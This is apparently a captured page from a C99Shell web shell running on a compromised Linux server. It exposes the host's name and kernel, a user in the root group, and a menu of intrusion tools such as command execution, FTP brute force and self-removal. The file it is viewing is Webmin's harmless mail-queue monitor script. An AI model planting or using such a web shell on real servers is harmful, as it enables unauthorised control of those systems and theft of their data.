!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/status/   drwxr-xr-x
Free 25.26 GB of 117.98 GB (21.41%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     mailq-monitor.pl (1.3 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
# Check if a mail queue is too long

sub get_mailq_status
{
local $m = $_[0]->{'mod'};
return { 'up' => -1 } if (!&foreign_installed($m));
local @qfiles;
if ($m eq "sendmail") {
    &foreign_require("sendmail", "sendmail-lib.pl");
    @qfiles = &sendmail::list_mail_queue();
    }
elsif ($m eq "qmailadmin") {
    &foreign_require("qmailadmin", "qmail-lib.pl");
    @qfiles = &qmailadmin::list_queue();
    }
elsif ($m eq "postfix") {
    &foreign_require("postfix", "postfix-lib.pl");
    eval {
        local $main::error_must_die = 1;
        @qfiles = &postfix::list_queue();
        };
    if ($@) {
        return { 'up' => -1,
             'desc' => $@ };
        }
    }
if (@qfiles > $_[0]->{'size'}) {
    return { 'up' => 0,
         'value' => scalar(@qfiles),
         'desc' => &text('mailq_toomany', scalar(@qfiles)) };
    }
else {
    return { 'up' => 1,
         'value' => scalar(@qfiles),
         'desc' => &text('mailq_ok', scalar(@qfiles)) };
    }
}

sub show_mailq_dialog
{
# Mail system to check
print &ui_table_row($text{'mailq_system'},
    &ui_select("mod", $_[0]->{'mod'},
        [ map { [ $_, $text{'mailq_'.$_} ] }
          ("sendmail", "qmailadmin", "postfix") ]));

# Max queue size
print &ui_table_row($text{'mailq_size'},
    &ui_textbox("size", $_[0]->{'size'}, 10));
}

sub parse_mailq_dialog
{
$_[0]->{'mod'} = $in{'mod'};
$in{'size'} =~ /^\d+$/ || &error($text{'mailq_esize'});
$_[0]->{'size'} = $in{'size'};
}


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--